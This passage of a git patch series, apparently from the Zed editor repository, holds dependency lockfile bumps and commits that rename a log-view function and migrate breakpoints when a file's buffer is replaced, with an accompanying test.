resolution: {integrity: sha512-a+UqTh4kgZg/SlGvfbzDHpgRu7AAQOmmqRHJnxhRZICKFUT91brVhNNt58CMWU9PsBbv3PDCZUHbVxuDiH2mtA==} @@ -131,19 +128,19 @@ packages: commander@2.20.3: resolution: {integrity: sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==} - core-js@3.45.1: - resolution: {integrity: sha512-L4NPsJlCfZsPeXukyzHFlg/i7IIVwHSItR0wg0FLNqYClJ4MQYTYLbC7EkjKYRLZF2iof2MUgN0EGy7MdQFChg==} + 
core-js@3.49.0: + resolution: {integrity: sha512-es1U2+YTtzpwkxVLwAFdSpaIMyQaq0PBgm3YD1W3Qpsn1NAmO3KSgZfu+oGSWVu6NvLHoHCV/aYcsE5wiB7ALg==} danger-plugin-pr-hygiene@0.7.1: resolution: {integrity: sha512-ll070nNaL3OeO2nooYWflPE/CRKLeq8GiH2C68u5zM3gW4gepH89GhVv0sYNNGLx4cYwa1zZ/TuiYYhC49z06Q==} - danger@13.0.4: - resolution: {integrity: sha512-IAdQ5nSJyIs4zKj6AN35ixt2B0Ce3WZUm3IFe/CMnL/Op7wV7IGg4D348U0EKNaNPP58QgXbdSk9pM+IXP1QXg==} + danger@13.0.7: + resolution: {integrity: sha512-H7Syz9P3np7tgOjTYs1DDogjlknPWYwBIJXUTFIK5iFZOQ0b8irkUz5swOLFUmw7j0aKuybhwkXTcfyHFvRzCQ==} engines: {node: '>=18'} hasBin: true - debug@4.4.1: - resolution: {integrity: sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==} + debug@4.4.3: + resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} engines: {node: '>=6.0'} peerDependencies: supports-color: '*' @@ -173,10 +170,6 @@ packages: resolution: {integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==} engines: {node: '>= 0.4'} - escape-string-regexp@1.0.5: - resolution: {integrity: sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==} - engines: {node: '>=0.8.0'} - fast-json-patch@3.1.1: resolution: {integrity: sha512-vf6IHUX2SBcA+5/+4883dsIjpBTqmfBjmYiWK1savxQmFk4JfBMLa7ynTYOs1Rolp/T1betJxHiGD3g1Mn8lUQ==} @@ -195,37 +188,33 @@ packages: resolution: {integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==} engines: {node: '>= 0.4'} - get-stdin@6.0.0: - resolution: {integrity: sha512-jp4tHawyV7+fkkSKyvjuLZswblUtz+SQKzSWnBbii16BuZksJlU1wuBYXY75r+duh/llF1ur6oNwi+2ZzjKZ7g==} - engines: {node: '>=4'} - gopd@1.2.0: resolution: {integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==} engines: {node: '>= 0.4'} - has-flag@2.0.0: - resolution: 
{integrity: sha512-P+1n3MnwjR/Epg9BBo1KT8qbye2g2Ou4sFumihwt6I4tsUX7jnLcX4BTOSKg/B1ZrIYMN9FcEnG4x5a7NB8Eng==} - engines: {node: '>=0.10.0'} + has-flag@4.0.0: + resolution: {integrity: sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==} + engines: {node: '>=8'} - has-flag@3.0.0: - resolution: {integrity: sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==} - engines: {node: '>=4'} + has-flag@5.0.1: + resolution: {integrity: sha512-CsNUt5x9LUdx6hnk/E2SZLsDyvfqANZSUq4+D3D8RzDJ2M+HDTIkF60ibS1vHaK55vzgiZw1bEPFG9yH7l33wA==} + engines: {node: '>=12'} has-symbols@1.1.0: resolution: {integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==} engines: {node: '>= 0.4'} - hasown@2.0.2: - resolution: {integrity: sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==} + hasown@2.0.3: + resolution: {integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==} engines: {node: '>= 0.4'} - http-proxy-agent@5.0.0: - resolution: {integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==} - engines: {node: '>= 6'} + http-proxy-agent@7.0.2: + resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} + engines: {node: '>= 14'} - https-proxy-agent@5.0.1: - resolution: {integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==} - engines: {node: '>= 6'} + https-proxy-agent@7.0.6: + resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} + engines: {node: '>= 14'} hyperlinker@1.0.0: resolution: {integrity: sha512-Ty8UblRWFEcfSuIaajM34LdPXIhbs1ajEX/BBPv24J+enSVaEVY63xQ6lTO9VRYS5LAoghIG0IDJ+p+IPzKUQQ==} @@ -248,18 +237,15 @@ packages: resolution: 
{integrity: sha512-p/nXbhSEcu3pZRdkW1OfJhpsVtW1gd4Wa1fnQc9YLiTfAjn0312eMKimbdIQzuZl9aa9xUGaRlP9T/CJE/ditQ==} engines: {node: '>=0.10.0'} - jsonwebtoken@9.0.2: - resolution: {integrity: sha512-PRp66vJ865SSqOlgqS8hujT5U4AOgMfhrwYIuIhfKaoSCZcirrmASQr8CX7cUg+RMih+hgznrjp99o+W4pJLHQ==} + jsonwebtoken@9.0.3: + resolution: {integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==} engines: {node: '>=12', npm: '>=6'} - jwa@1.4.2: - resolution: {integrity: sha512-eeH5JO+21J78qMvTIDdBXidBd6nG2kZjg5Ohz/1fpa28Z4CcsWUzJ1ZZyFq/3z3N17aZy+ZuBoHljASbL1WfOw==} + jwa@2.0.1: + resolution: {integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==} - jws@3.2.2: - resolution: {integrity: sha512-YHlZCB6lMTllWDtSPHz/ZXTsi8S00usEV6v1tjq8tOUZzw7DpSDWVXjXDre6ed1w/pd495ODpHZYSdkRTsa0HA==} - - lodash.find@4.6.0: - resolution: {integrity: sha512-yaRZoAV3Xq28F1iafWN1+a0rflOej93l1DQUejs3SZ41h2O9UJBoS9aueGjPDgAl4B6tPC0NuuchLKaDQQ3Isg==} + jws@4.0.1: + resolution: {integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==} lodash.includes@4.3.0: resolution: {integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==} @@ -282,9 +268,6 @@ packages: lodash.isstring@4.0.1: resolution: {integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==} - lodash.keys@4.2.0: - resolution: {integrity: sha512-J79MkJcp7Df5mizHiVNpjoHXLi4HLjh9VLS/M7lQSGoQ+0oQ+lWEigREkqKyizPB1IawvQLLKY8mzEcm1tkyxQ==} - lodash.mapvalues@4.6.0: resolution: {integrity: sha512-JPFqXFeZQ7BfS00H58kClY7SPVeHertPE0lNuCyZ26/XlN8TvakYD7b9bGyNmXbT/D3BbtPAAmq90gPWqLkxlQ==} @@ -333,27 +316,19 @@ packages: override-require@1.1.1: resolution: {integrity: sha512-eoJ9YWxFcXbrn2U8FKT6RV+/Kj7fiGAB1VvHzbYKt8xM5ZuKZgCGvnHzDxmreEjcBH28ejg5MiOH4iyY1mQnkg==} - p-limit@2.3.0: - resolution: {integrity: 
sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==} - engines: {node: '>=6'} - - p-try@2.2.0: - resolution: {integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==} - engines: {node: '>=6'} - parse-diff@0.7.1: resolution: {integrity: sha512-1j3l8IKcy4yRK2W4o9EYvJLSzpAVwz4DXqCewYyx2vEwk2gcf3DBPqc8Fj4XV3K33OYJ08A8fWwyu/ykD/HUSg==} - parse-github-url@1.0.3: - resolution: {integrity: sha512-tfalY5/4SqGaV/GIGzWyHnFjlpTPTNpENR9Ea2lLldSJ8EWXMsvacWucqY3m3I4YPtas15IxTLQVQ5NSYXPrww==} + parse-github-url@1.0.4: + resolution: {integrity: sha512-CEtCOt55fHmd6DpBc/N7H5NC4vJpcquhzzs9Iw2mRj8bVxo1O5TQI5MXKOMO7+yBOqD+5dKCCRK4Kj1KskZc6Q==} engines: {node: '>= 0.10'} hasBin: true parse-link-header@2.0.0: resolution: {integrity: sha512-xjU87V0VyHZybn2RrCX5TIFGxTVZE6zqqZWMPlIKiSKuWh/X5WZdt+w1Ki1nXB+8L/KtL+nZ4iq+sfI6MrhhMw==} - picomatch@2.3.1: - resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==} + picomatch@2.3.2: + resolution: {integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==} engines: {node: '>=8.6'} pinpoint@1.1.0: @@ -363,8 +338,8 @@ packages: resolution: {integrity: sha512-rksPWtoZb2ZpT5OVgtmy0KHVM+Dca3iVwWY9ifwhcexfjebtgjg3wmrUt9PvJ59XIYBcknQeYHD8IAnVlh9lAw==} hasBin: true - qs@6.14.0: - resolution: {integrity: sha512-YWWTjgABSKcvs/nWBi9PycY/JiPJqOD4JA6o9Sej2AtvSGarXxKC3OQSk4pAarbdQlKAh5D4FCQkJNkW+GAn3w==} + qs@6.15.1: + resolution: {integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==} engines: {node: '>=0.6'} readline-sync@1.4.10: @@ -385,13 +360,13 @@ packages: safe-buffer@5.2.1: resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==} - semver@7.7.2: - resolution: {integrity: 
sha512-RF0Fw+rO5AMf9MAyaRXI4AV0Ulj5lMHqVxxdSgiVbixSCXoEmmX/jk0CuJw4+3SqroYO9VoUh+HcuJivvtJemA==} + semver@7.7.4: + resolution: {integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==} engines: {node: '>=10'} hasBin: true - side-channel-list@1.0.0: - resolution: {integrity: sha512-FCLHtRD/gnpCiCHEiJLOwdmFP+wzCmDEkc9y7NsYxeF4u7Btsn1ZuwgwJGxImImHicJArLP4R0yX4c2KCrMrTA==} + side-channel-list@1.0.1: + resolution: {integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==} engines: {node: '>= 0.4'} side-channel-map@1.0.1: @@ -406,13 +381,17 @@ packages: resolution: {integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==} engines: {node: '>= 0.4'} - supports-color@5.5.0: - resolution: {integrity: sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==} - engines: {node: '>=4'} + supports-color@10.2.2: + resolution: {integrity: sha512-SS+jx45GF1QjgEXQx4NJZV9ImqmO2NPz5FNsIHrsDjh2YsHnawpan7SNQ1o8NuhrbHZy9AZhIoCUiCeaW/C80g==} + engines: {node: '>=18'} - supports-hyperlinks@1.0.1: - resolution: {integrity: sha512-HHi5kVSefKaJkGYXbDuKbUGRVxqnWGn3J2e39CYcNJEfWciGq2zYtOhXLTlvrOZW1QU7VX67w7fMmWafHX9Pfw==} - engines: {node: '>=4'} + supports-color@7.2.0: + resolution: {integrity: sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==} + engines: {node: '>=8'} + + supports-hyperlinks@4.4.0: + resolution: {integrity: sha512-UKbpT93hN5Nr9go5UY7bopIB9YQlMz9nm/ct4IXt/irb5YRkn9WaqrOBJGZ5Pwvsd5FQzSVeYlGdXoCAPQZrPg==} + engines: {node: '>=20'} to-regex-range@5.0.1: resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==} @@ -445,12 +424,12 @@ snapshots: '@gitbeaker/core@38.12.1': dependencies: '@gitbeaker/requester-utils': 38.12.1 - qs: 6.14.0 + qs: 6.15.1 xcase: 2.0.1 
'@gitbeaker/requester-utils@38.12.1': dependencies: - qs: 6.14.0 + qs: 6.15.1 xcase: 2.0.1 '@gitbeaker/rest@38.12.1': @@ -521,17 +500,11 @@ snapshots: dependencies: '@octokit/openapi-types': 24.2.0 - '@tootallnate/once@2.0.0': {} - - agent-base@6.0.2: - dependencies: - debug: 4.4.1 - transitivePeerDependencies: - - supports-color + agent-base@7.1.4: {} - ansi-styles@3.2.1: + ansi-styles@4.3.0: dependencies: - color-convert: 1.9.3 + color-convert: 2.0.1 async-retry@1.2.3: dependencies: @@ -555,48 +528,44 @@ snapshots: call-bind-apply-helpers: 1.0.2 get-intrinsic: 1.3.0 - chalk@2.4.2: + chalk@4.1.2: dependencies: - ansi-styles: 3.2.1 - escape-string-regexp: 1.0.5 - supports-color: 5.5.0 + ansi-styles: 4.3.0 + supports-color: 7.2.0 - color-convert@1.9.3: + color-convert@2.0.1: dependencies: - color-name: 1.1.3 + color-name: 1.1.4 - color-name@1.1.3: {} + color-name@1.1.4: {} colors@1.4.0: {} commander@2.20.3: {} - core-js@3.45.1: {} + core-js@3.49.0: {} danger-plugin-pr-hygiene@0.7.1: {} - danger@13.0.4: + danger@13.0.7: dependencies: '@gitbeaker/rest': 38.12.1 '@octokit/rest': 20.1.2 async-retry: 1.2.3 - chalk: 2.4.2 + chalk: 4.1.2 commander: 2.20.3 - core-js: 3.45.1 - debug: 4.4.1 + core-js: 3.49.0 + debug: 4.4.3 fast-json-patch: 3.1.1 - get-stdin: 6.0.0 - http-proxy-agent: 5.0.0 - https-proxy-agent: 5.0.1 + http-proxy-agent: 7.0.2 + https-proxy-agent: 7.0.6 hyperlinker: 1.0.0 ini: 5.0.0 json5: 2.2.3 jsonpointer: 5.0.1 - jsonwebtoken: 9.0.2 - lodash.find: 4.6.0 + jsonwebtoken: 9.0.3 lodash.includes: 4.3.0 lodash.isobject: 3.0.2 - lodash.keys: 4.2.0 lodash.mapvalues: 4.6.0 lodash.memoize: 4.1.2 memfs-or-file-map-to-github-branch: 1.3.0 @@ -604,21 +573,20 @@ snapshots: node-cleanup: 2.1.2 node-fetch: 2.7.0 override-require: 1.1.1 - p-limit: 2.3.0 parse-diff: 0.7.1 - parse-github-url: 1.0.3 + parse-github-url: 1.0.4 parse-link-header: 2.0.0 pinpoint: 1.1.0 prettyjson: 1.2.5 readline-sync: 1.4.10 regenerator-runtime: 0.13.11 require-from-string: 2.0.2 - 
supports-hyperlinks: 1.0.1 + supports-hyperlinks: 4.4.0 transitivePeerDependencies: - encoding - supports-color - debug@4.4.1: + debug@4.4.3: dependencies: ms: 2.1.3 @@ -642,8 +610,6 @@ snapshots: dependencies: es-errors: 1.3.0 - escape-string-regexp@1.0.5: {} - fast-json-patch@3.1.1: {} fill-range@7.1.1: @@ -662,7 +628,7 @@ snapshots: get-proto: 1.0.1 gopd: 1.2.0 has-symbols: 1.1.0 - hasown: 2.0.2 + hasown: 2.0.3 math-intrinsics: 1.1.0 get-proto@1.0.1: @@ -670,32 +636,29 @@ snapshots: dunder-proto: 1.0.1 es-object-atoms: 1.1.1 - get-stdin@6.0.0: {} - gopd@1.2.0: {} - has-flag@2.0.0: {} + has-flag@4.0.0: {} - has-flag@3.0.0: {} + has-flag@5.0.1: {} has-symbols@1.1.0: {} - hasown@2.0.2: + hasown@2.0.3: dependencies: function-bind: 1.1.2 - http-proxy-agent@5.0.0: + http-proxy-agent@7.0.2: dependencies: - '@tootallnate/once': 2.0.0 - agent-base: 6.0.2 - debug: 4.4.1 + agent-base: 7.1.4 + debug: 4.4.3 transitivePeerDependencies: - supports-color - https-proxy-agent@5.0.1: + https-proxy-agent@7.0.6: dependencies: - agent-base: 6.0.2 - debug: 4.4.1 + agent-base: 7.1.4 + debug: 4.4.3 transitivePeerDependencies: - supports-color @@ -709,9 +672,9 @@ snapshots: jsonpointer@5.0.1: {} - jsonwebtoken@9.0.2: + jsonwebtoken@9.0.3: dependencies: - jws: 3.2.2 + jws: 4.0.1 lodash.includes: 4.3.0 lodash.isboolean: 3.0.3 lodash.isinteger: 4.0.4 @@ -720,21 +683,19 @@ snapshots: lodash.isstring: 4.0.1 lodash.once: 4.1.1 ms: 2.1.3 - semver: 7.7.2 + semver: 7.7.4 - jwa@1.4.2: + jwa@2.0.1: dependencies: buffer-equal-constant-time: 1.0.1 ecdsa-sig-formatter: 1.0.11 safe-buffer: 5.2.1 - jws@3.2.2: + jws@4.0.1: dependencies: - jwa: 1.4.2 + jwa: 2.0.1 safe-buffer: 5.2.1 - lodash.find@4.6.0: {} - lodash.includes@4.3.0: {} lodash.isboolean@3.0.3: {} @@ -749,8 +710,6 @@ snapshots: lodash.isstring@4.0.1: {} - lodash.keys@4.2.0: {} - lodash.mapvalues@4.6.0: {} lodash.memoize@4.1.2: {} @@ -766,7 +725,7 @@ snapshots: micromatch@4.0.8: dependencies: braces: 3.0.3 - picomatch: 2.3.1 + picomatch: 2.3.2 
minimist@1.2.8: {} @@ -786,21 +745,15 @@ snapshots: override-require@1.1.1: {} - p-limit@2.3.0: - dependencies: - p-try: 2.2.0 - - p-try@2.2.0: {} - parse-diff@0.7.1: {} - parse-github-url@1.0.3: {} + parse-github-url@1.0.4: {} parse-link-header@2.0.0: dependencies: xtend: 4.0.2 - picomatch@2.3.1: {} + picomatch@2.3.2: {} pinpoint@1.1.0: {} @@ -809,7 +762,7 @@ snapshots: colors: 1.4.0 minimist: 1.2.8 - qs@6.14.0: + qs@6.15.1: dependencies: side-channel: 1.1.0 @@ -823,9 +776,9 @@ snapshots: safe-buffer@5.2.1: {} - semver@7.7.2: {} + semver@7.7.4: {} - side-channel-list@1.0.0: + side-channel-list@1.0.1: dependencies: es-errors: 1.3.0 object-inspect: 1.13.4 @@ -849,18 +802,20 @@ snapshots: dependencies: es-errors: 1.3.0 object-inspect: 1.13.4 - side-channel-list: 1.0.0 + side-channel-list: 1.0.1 side-channel-map: 1.0.1 side-channel-weakmap: 1.0.2 - supports-color@5.5.0: + supports-color@10.2.2: {} + + supports-color@7.2.0: dependencies: - has-flag: 3.0.0 + has-flag: 4.0.0 - supports-hyperlinks@1.0.1: + supports-hyperlinks@4.4.0: dependencies: - has-flag: 2.0.0 - supports-color: 5.5.0 + has-flag: 5.0.1 + supports-color: 10.2.2 to-regex-range@5.0.1: dependencies: From 4241b8d4a88b49820cc5aab740604c60620352c2 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:39:38 +0200 Subject: [PATCH 158/231] language_tools: Open server logs instead of server trace on View Logs (#55621) Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/language_tools/src/lsp_button.rs | 2 +- crates/language_tools/src/lsp_log_view.rs | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 85ab4684351195..8fbe4385a172f3 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -420,7 +420,7 @@ impl LanguageServerState { let workspace_for_debug = workspace.clone(); let server_selector_for_debug = server_selector.clone(); submenu = submenu.entry("View Logs", None, move |window, cx| { - lsp_log_view::open_server_trace( + lsp_log_view::open( &lsp_logs_for_debug, workspace_for_debug.clone(), server_selector_for_debug.clone(), diff --git a/crates/language_tools/src/lsp_log_view.rs b/crates/language_tools/src/lsp_log_view.rs index 06c7e9f77f6c60..a54f2961c79096 100644 --- a/crates/language_tools/src/lsp_log_view.rs +++ b/crates/language_tools/src/lsp_log_view.rs @@ -28,7 +28,7 @@ use workspace::{ use crate::get_or_create_tool; -pub fn open_server_trace( +pub fn open( log_store: &Entity, workspace: WeakEntity, server: LanguageServerSelector, @@ -67,7 +67,7 @@ pub fn open_server_trace( } }; if let Some(server_id) = server_id { - log_view.show_rpc_trace_for_server(server_id, window, cx); + log_view.show_logs_for_server(server_id, window, cx); } }); }) From 4cecb742795a81e8349504af69a59004b980e27b Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:39:52 +0200 Subject: [PATCH 159/231] editor: Fix stale breakpoints when re-opening buffers for a saved file (#55610) Fixes ZED-73M Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/editor/src/editor_tests.rs | 105 +++++++++++++++++- .../project/src/debugger/breakpoint_store.rs | 25 ++++- 2 files changed, 127 insertions(+), 3 deletions(-) diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 05fb9425c6a0b0..03f332821a8346 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -41,7 +41,7 @@ use multi_buffer::{IndentGuide, MultiBuffer, MultiBufferOffset, MultiBufferOffse use parking_lot::Mutex; use pretty_assertions::{assert_eq, assert_ne}; use project::{ - FakeFs, Project, + FakeFs, Project, ProjectPath, bookmark_store::SerializedBookmark, debugger::breakpoint_store::{BreakpointState, SourceBreakpoint}, project_settings::LspSettings, @@ -27994,6 +27994,109 @@ async fn test_breakpoint_toggling(cx: &mut TestAppContext) { assert_breakpoint(&breakpoints, &abs_path, vec![]); } +#[gpui::test] +async fn test_breakpoint_after_save_as_existing_path(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/a"), + json!({ + "main.rs": "First line\nSecond line\nThird line\nFourth line", + }), + ) + .await; + let project = Project::test(fs, [path!("/a").as_ref()], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = + multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()); + + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + + let first_buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree_id, rel_path("main.rs")), cx) + }) + .await + .unwrap(); + + let (first_editor, cx) = cx.add_window_view(|window, cx| { + Editor::new( + EditorMode::full(), + MultiBuffer::build_from_buffer(first_buffer, cx), + Some(project.clone()), + window, + cx, + ) + 
}); + + first_editor.update_in(cx, |editor, window, cx| { + editor.toggle_breakpoint(&actions::ToggleBreakpoint, window, cx); + }); + + let replacement_buffer = project.update(cx, |project, cx| { + project.create_local_buffer("Alpha\nBeta\nGamma", None, true, cx) + }); + project + .update(cx, |project, cx| { + project.save_buffer_as( + replacement_buffer.clone(), + ProjectPath { + worktree_id, + path: rel_path("main.rs").into(), + }, + cx, + ) + }) + .await + .unwrap(); + + let (replacement_editor, cx) = cx.add_window_view(|window, cx| { + Editor::new( + EditorMode::full(), + MultiBuffer::build_from_buffer(replacement_buffer, cx), + Some(project.clone()), + window, + cx, + ) + }); + + replacement_editor.update_in(cx, |editor, window, cx| { + editor.move_down(&MoveDown, window, cx); + editor.toggle_breakpoint(&actions::ToggleBreakpoint, window, cx); + }); + + let project_path = first_editor.update(cx, |editor, cx| editor.project_path(cx).unwrap()); + let abs_path = project.read_with(cx, |project, cx| { + project + .absolute_path(&project_path, cx) + .map(Arc::from) + .unwrap() + }); + + let breakpoints = first_editor.update(cx, |editor, cx| { + editor + .breakpoint_store() + .as_ref() + .unwrap() + .read(cx) + .source_breakpoints_from_path(&abs_path, cx) + }); + + assert_eq!( + vec![0, 1], + breakpoints + .into_iter() + .map(|breakpoint| breakpoint.row) + .collect::>() + ); +} + #[gpui::test] async fn test_log_breakpoint_editing(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/project/src/debugger/breakpoint_store.rs b/crates/project/src/debugger/breakpoint_store.rs index 50df9ae3125d3d..f307afe888a18a 100644 --- a/crates/project/src/debugger/breakpoint_store.rs +++ b/crates/project/src/debugger/breakpoint_store.rs @@ -16,7 +16,7 @@ use rpc::{ proto::{self}, }; use std::{hash::Hash, ops::Range, path::Path, sync::Arc, u32}; -use text::{Point, PointUtf16}; +use text::{Bias, Point, PointUtf16, Unclipped}; use util::maybe; use crate::{ProjectPath, 
buffer_store::BufferStore, worktree_store::WorktreeStore}; @@ -415,7 +415,28 @@ impl BreakpointStore { let breakpoint_set = self .breakpoints .entry(abs_path.clone()) - .or_insert_with(|| BreakpointsInFile::new(buffer, cx)); + .or_insert_with(|| BreakpointsInFile::new(buffer.clone(), cx)); + + // Buffers changed for the file, migrate breakpoints to the new buffer + if breakpoint_set.buffer != buffer { + let old_snapshot = breakpoint_set.buffer.read(cx).snapshot(); + let new_snapshot = buffer.read(cx).snapshot(); + let breakpoints = breakpoint_set + .breakpoints + .drain(..) + .map(|mut breakpoint| { + let old_position = + old_snapshot.summary_for_anchor::(breakpoint.position()); + let new_position = PointUtf16::new(old_position.row, 0); + let new_position = + new_snapshot.clip_point_utf16(Unclipped(new_position), Bias::Left); + breakpoint.bp.position = new_snapshot.anchor_after(new_position); + breakpoint + }) + .collect(); + *breakpoint_set = BreakpointsInFile::new(buffer, cx); + breakpoint_set.breakpoints = breakpoints; + } match edit_action { BreakpointEditAction::Toggle => { From 7482c8d9f193c71dfec2de356fe62da2abd4e217 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:42:34 +0200 Subject: [PATCH 160/231] Bump dependencies with warnings (#55614) Updates dependencies with potential warnings. 
- **Update quinn-proto** - **Update awc-lc-rs** - **Update openssl** - **Bump rustls** - **Update aws crates** - **Bump rand** Release Notes: - N/A --- Cargo.lock | 450 ++++++++++++++++++++++++++++------------------------- 1 file changed, 234 insertions(+), 216 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 1dde4ac88509ad..26c34c1fcc3184 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -31,7 +31,7 @@ dependencies = [ "portable-pty", "project", "prompt_store", - "rand 0.9.3", + "rand 0.9.4", "serde", "serde_json", "settings", @@ -85,7 +85,7 @@ dependencies = [ "log", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "serde_json", "settings", "telemetry", @@ -189,7 +189,7 @@ dependencies = [ "pretty_assertions", "project", "prompt_store", - "rand 0.9.3", + "rand 0.9.4", "regex", "reqwest_client", "rust-embed", @@ -404,7 +404,7 @@ dependencies = [ "project", "prompt_store", "proto", - "rand 0.9.3", + "rand 0.9.4", "release_channel", "remote", "remote_connection", @@ -1145,7 +1145,7 @@ dependencies = [ "pin-project-lite", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + 